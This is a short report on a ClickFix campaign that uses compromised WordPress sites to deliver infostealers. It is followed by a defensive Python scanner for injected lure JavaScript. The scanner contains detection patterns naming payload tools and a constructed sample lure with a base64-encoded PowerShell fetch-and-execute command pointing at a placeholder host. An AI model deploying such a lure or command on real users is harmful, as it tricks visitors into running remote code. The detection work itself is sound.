A recent cyber-criminal campaign has compromised more than 250 legitimate WordPress websites and is using them to push infostealer malware, designed to harvest sensitive data, onto their visitors. Active since December 2025, the campaign has hit sites in at least 12 countries. It trades on visitors' trust in the compromised sites to deliver ClickFix lures: fake verification prompts that instruct the visitor to paste and run a command, so that the user, not an exploit, executes the malicious code. Threat researchers at Rapid7 assess that vulnerable WordPress plugins or themes are the likely initial access vector, although the exact point of entry has not been confirmed.
Recommendations for site administrators include keeping WordPress core, plugins and themes updated; using strong, unique passwords; enabling two-factor authentication on administrator accounts; and never running untrusted code.
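As an added example (not code from the article or from Rapid7), the following Python scanner shows what a site administrator could run over a WordPress install to look for injected ClickFix-style JavaScript. The indicator patterns, the flagging rule and the two sample snippets are assumptions modelled on the generic ClickFix lure (a fake "verify you are human" overlay that copies a command to the clipboard and tells the visitor to paste it into the Run dialog); they are not indicators taken from the campaign itself.

```python
"""Scan WordPress files for injected ClickFix-style lures.

Added example, not code from the article or from Rapid7. The indicator
patterns and the two sample snippets below are assumptions modelled on the
generic ClickFix lure (a fake "verify you are human" overlay that copies a
command to the clipboard and tells the visitor to paste it into Win+R).
"""
import base64
import re
import sys
from pathlib import Path

# Indicator categories (assumed, not IOCs from the report). A hit in one
# category alone is common in benign code (e.g. a "copy code" button), so the
# flag rule below requires the clipboard write plus a lure or a payload.
INDICATORS = {
    "clipboard": re.compile(
        r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I),
    "payload": re.compile(
        r"powershell|mshta|cmd\.exe|wscript|rundll32|certutil|bash\s+-c", re.I),
    "lure": re.compile(
        r"verify\s+you\s+are\s+human|not\s+a\s+robot|win(?:dows)?\s*\+\s*r"
        r"|run\s+dialog|ctrl\s*\+\s*v", re.I),
}
# atob("...") literals: ClickFix pages often base64-encode the command so the
# raw file never contains the word "powershell".
B64_LITERAL = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")


def decode_b64_literals(text):
    """Return the decodings of every atob("...") literal found in text."""
    decoded = []
    for literal in B64_LITERAL.findall(text):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "ignore"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def scan_text(text):
    """Classify one file's contents: per-category hits, decoded base64
    literals, and whether the file should be flagged for review."""
    decoded = decode_b64_literals(text)
    haystack = text + "\n" + "\n".join(decoded)  # search raw and decoded text
    hits = {name: bool(rx.search(haystack)) for name, rx in INDICATORS.items()}
    flagged = hits["clipboard"] and (hits["lure"] or hits["payload"])
    return {"hits": hits, "decoded": decoded, "flagged": flagged}


def scan_files(named_texts):
    """Scan (name, text) pairs; return [(name, result)] for flagged entries."""
    findings = []
    for name, text in named_texts:
        result = scan_text(text)
        if result["flagged"]:
            findings.append((name, result))
    return findings


def scan_tree(root, suffixes=(".php", ".js", ".html")):
    """Walk a WordPress install (wp-content/themes, plugins, uploads, ...)
    and scan every file whose suffix is in `suffixes`."""
    paths = (p for p in Path(root).rglob("*") if p.is_file() and p.suffix in suffixes)
    return scan_files((str(p), p.read_text(errors="ignore")) for p in paths)


# Constructed samples (not real injected code from the campaign).
ENCODED_CMD = base64.b64encode(
    b'powershell -w hidden -c "iwr http://example.invalid/x | iex"').decode()
MALICIOUS_SAMPLE = f"""
<div class="verify">Verify you are human: press Win + R, then Ctrl + V, then Enter</div>
<script>
  var c = atob("{ENCODED_CMD}");
  navigator.clipboard.writeText(c);
</script>
"""
BENIGN_SAMPLE = """
<button onclick="navigator.clipboard.writeText(
    document.getElementById('snippet').innerText)">Copy code</button>
"""


if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: python scan_clickfix.py /var/www/html
        for name, result in scan_tree(sys.argv[1]):
            print(f"FLAGGED {name}: {result['hits']}")
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_text(sample))
```

The scanner deliberately decodes `atob()` literals before matching, because the lure's command is usually base64-encoded in the page and only becomes `powershell ...` in the visitor's browser; a grep for the literal string would miss it. The flag rule requires the clipboard write together with a lure string or a payload, so an ordinary "copy code" button is not reported. Treat a hit as a lead for manual review of the file's history and the site's plugin and theme versions, not as proof of compromise.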